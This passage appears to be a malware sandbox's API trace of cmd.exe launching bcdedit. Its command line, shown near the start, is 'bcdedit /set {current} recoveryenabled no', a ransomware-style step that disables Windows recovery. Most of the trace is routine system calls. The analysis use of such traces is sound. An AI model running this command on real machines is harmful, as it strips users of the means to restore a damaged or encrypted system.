out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x1, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x0, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x9, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x9, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x9, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.089] RegCloseKey (hKey=0x44) returned 0x0 [0114.090] time (in: timer=0x0 | out: timer=0x0) returned 0x5e691d8d [0114.090] srand (_Seed=0x5e691d8d) [0114.090] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} recoveryenabled no" [0114.090] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} recoveryenabled no" [0114.090] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.090] GetProcessHeap () returned 0x2b0000 [0114.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2caaf0 [0114.090] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cab00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.091] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, 
nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.091] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.091] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.091] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.091] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.091] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.091] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.091] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.091] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.091] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.091] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.092] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.092] GetProcessHeap () returned 0x2b0000 [0114.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c95d0 | out: hHeap=0x2b0000) returned 1 [0114.092] GetEnvironmentStringsW () returned 0x2c8b40* [0114.092] GetProcessHeap () returned 0x2b0000 [0114.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa94) returned 0x2cad10 [0114.092] FreeEnvironmentStringsW (penv=0x2c8b40) returned 1 [0114.092] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.092] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.093] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.093] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.093] _wcsicmp (_String1="KEYS", 
_String2="CMDEXTVERSION") returned 8 [0114.093] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.093] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.093] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.093] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.093] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.094] GetProcessHeap () returned 0x2b0000 [0114.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x5c) returned 0x2cb7b0 [0114.094] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f3d0, lpFilePart=0x14f3b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f3b0*="Desktop") returned 0x25 [0114.094] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.094] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f0e0 | out: lpFindFileData=0x14f0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2cb820 [0114.094] FindClose (in: hFindFile=0x2cb820 | out: hFindFile=0x2cb820) returned 1 [0114.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f0e0 | out: lpFindFileData=0x14f0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, 
ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2cb820 [0114.095] FindClose (in: hFindFile=0x2cb820 | out: hFindFile=0x2cb820) returned 1 [0114.095] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0114.095] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f0e0 | out: lpFindFileData=0x14f0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x218e9fe0, ftLastAccessTime.dwHighDateTime=0x1d5f7c9, ftLastWriteTime.dwLowDateTime=0x218e9fe0, ftLastWriteTime.dwHighDateTime=0x1d5f7c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2cb820 [0114.095] FindClose (in: hFindFile=0x2cb820 | out: hFindFile=0x2cb820) returned 1 [0114.095] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.096] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0114.096] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.096] GetProcessHeap () returned 0x2b0000 [0114.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cad10 | out: hHeap=0x2b0000) returned 1 [0114.096] GetEnvironmentStringsW () returned 0x2cb820* [0114.096] GetProcessHeap () returned 0x2b0000 [0114.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xae8) returned 0x2cc310 [0114.097] FreeEnvironmentStringsW (penv=0x2cb820) returned 1 [0114.097] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.097] GetProcessHeap () returned 0x2b0000 [0114.097] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb7b0 | out: hHeap=0x2b0000) returned 1 [0114.097] GetProcessHeap () returned 0x2b0000 [0114.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4016) returned 0x2cce00 [0114.098] GetProcessHeap () returned 0x2b0000 [0114.098] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x68) returned 0x2c9630 [0114.098] GetProcessHeap () returned 0x2b0000 [0114.098] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cce00 | out: hHeap=0x2b0000) returned 1 [0114.098] GetConsoleOutputCP () returned 0x1b5 [0114.099] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.099] GetUserDefaultLCID () returned 0x409 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac27b50, cchData=8 | out: lpLCData=":") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f4e0, cchData=128 | out: lpLCData="0") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f4e0, cchData=128 | out: lpLCData="0") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f4e0, cchData=128 | out: lpLCData="1") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac3a740, cchData=8 | out: lpLCData="/") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac3a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac3a460, cchData=32 | out: lpLCData="Tue") returned 4 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac3a420, cchData=32 | out: lpLCData="Wed") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac3a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.101] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac3a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac3a360, cchData=32 | out: lpLCData="Sat") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac3a700, cchData=32 | out: lpLCData="Sun") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac27b40, cchData=8 | out: lpLCData=".") returned 2 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac3a4e0, cchData=8 | out: lpLCData=",") returned 2 [0114.101] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.102] GetProcessHeap () returned 0x2b0000 [0114.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20c) returned 0x2c9710 [0114.103] GetConsoleTitleW (in: lpConsoleTitle=0x2c9710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.103] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.103] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0114.103] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0114.104] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0114.104] GetProcessHeap () returned 0x2b0000 [0114.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4012) returned 0x2cce00 [0114.104] GetProcessHeap () returned 0x2b0000 [0114.104] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cce00 | out: hHeap=0x2b0000) returned 1 [0114.106] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0114.106] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0114.106] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0114.106] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0114.106] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0114.107] _wcsicmp 
(_String1="REM", _String2="bcdedit") returned 16 [0114.107] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0114.107] GetProcessHeap () returned 0x2b0000 [0114.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0) returned 0x2c9930 [0114.107] GetProcessHeap () returned 0x2b0000 [0114.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x20) returned 0x2c4670 [0114.109] GetProcessHeap () returned 0x2b0000 [0114.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x56) returned 0x2c99f0 [0114.111] GetConsoleTitleW (in: lpConsoleTitle=0x14f3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.113] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0114.113] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0114.113] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0114.113] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0114.113] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0114.113] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0114.113] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0114.113] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0114.113] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0114.113] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0114.113] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0114.113] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0114.114] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0114.114] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0114.114] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0114.114] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0114.114] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0114.114] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0114.114] _wcsicmp (_String1="bcdedit", _String2="RMDIR") 
returned -16 [0114.114] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0114.114] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0114.114] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0114.114] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0114.114] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0114.114] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0114.114] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0114.114] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0114.114] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0114.115] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0114.115] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0114.115] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0114.115] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0114.115] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0114.115] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0114.115] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0114.115] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0114.115] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0114.115] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0114.115] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0114.115] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0114.115] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0114.115] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0114.116] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0114.116] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0114.116] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0114.116] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0114.116] _wcsicmp (_String1="bcdedit", _String2="COPY") returned 
-1 [0114.116] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0114.116] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0114.116] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0114.116] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0114.116] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0114.116] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0114.116] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0114.116] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0114.116] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0114.116] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0114.116] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0114.116] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0114.117] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0114.117] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0114.117] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0114.117] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0114.117] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0114.117] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0114.117] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0114.117] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0114.117] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0114.117] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0114.117] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0114.117] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0114.117] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0114.117] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0114.117] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0114.117] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 
[0114.117] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0114.118] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0114.118] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0114.118] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0114.118] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0114.118] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0114.118] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0114.118] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0114.118] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0114.118] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0114.118] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0114.118] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0114.119] GetProcessHeap () returned 0x2b0000 [0114.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2c9a50 [0114.119] GetProcessHeap () returned 0x2b0000 [0114.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x66) returned 0x2c9c70 [0114.119] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0114.119] GetProcessHeap () returned 0x2b0000 [0114.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x420) returned 0x2b1320 [0114.120] SetErrorMode (uMode=0x0) returned 0x0 [0114.120] SetErrorMode (uMode=0x1) returned 0x0 [0114.120] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2b1330, lpFilePart=0x14ec80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14ec80*="Desktop") returned 0x25 [0114.120] SetErrorMode (uMode=0x0) returned 0x1 [0114.120] GetProcessHeap () returned 0x2b0000 [0114.120] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2b1320, Size=0x6c) returned 0x2b1320 [0114.120] GetProcessHeap () returned 0x2b0000 [0114.120] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b1320) returned 0x6c 
[0114.121] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.121] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.121] GetProcessHeap () returned 0x2b0000 [0114.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x128) returned 0x2c9ce0 [0114.121] GetProcessHeap () returned 0x2b0000 [0114.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x240) returned 0x2c9e10 [0114.295] GetProcessHeap () returned 0x2b0000 [0114.295] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c9e10, Size=0x12a) returned 0x2c9e10 [0114.296] GetProcessHeap () returned 0x2b0000 [0114.296] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c9e10) returned 0x12a [0114.296] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.296] GetProcessHeap () returned 0x2b0000 [0114.296] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xe8) returned 0x2c9f50 [0114.296] GetProcessHeap () returned 0x2b0000 [0114.296] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c9f50, Size=0x7e) returned 0x2c9f50 [0114.296] GetProcessHeap () returned 0x2b0000 [0114.296] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c9f50) returned 0x7e [0114.429] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.430] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0xffffffffffffffff [0114.430] GetLastError () returned 0x2 [0114.430] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0xffffffffffffffff [0114.430] GetLastError () returned 0x2 [0114.430] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.431] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0x2c9fe0 [0114.433] GetProcessHeap () returned 0x2b0000 [0114.433] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x28) returned 0x2c46a0 [0114.433] FindClose (in: hFindFile=0x2c9fe0 | out: hFindFile=0x2c9fe0) returned 1 [0114.433] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0xffffffffffffffff [0114.433] GetLastError () returned 0x2 [0114.433] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0x2c9fe0 [0114.434] GetProcessHeap () returned 0x2b0000 [0114.434] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c46a0, Size=0x8) returned 0x2ca040 [0114.434] FindClose (in: hFindFile=0x2c9fe0 | out: hFindFile=0x2c9fe0) returned 1 [0114.434] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.434] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.434] GetConsoleTitleW (in: lpConsoleTitle=0x14ef40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.434] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ecf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ecb8 | out: lpAttributeList=0x14ecf8, lpSize=0x14ecb8) returned 1 [0114.434] UpdateProcThreadAttribute (in: lpAttributeList=0x14ecf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x14eca8, cbSize=0x4, 
lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ecf8, lpPreviousValue=0x0) returned 1 [0114.435] GetStartupInfoW (in: lpStartupInfo=0x14ee10 | out: lpStartupInfo=0x14ee10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0114.435] GetProcessHeap () returned 0x2b0000 [0114.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x20) returned 0x2c46a0 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.435] _wcsnicmp 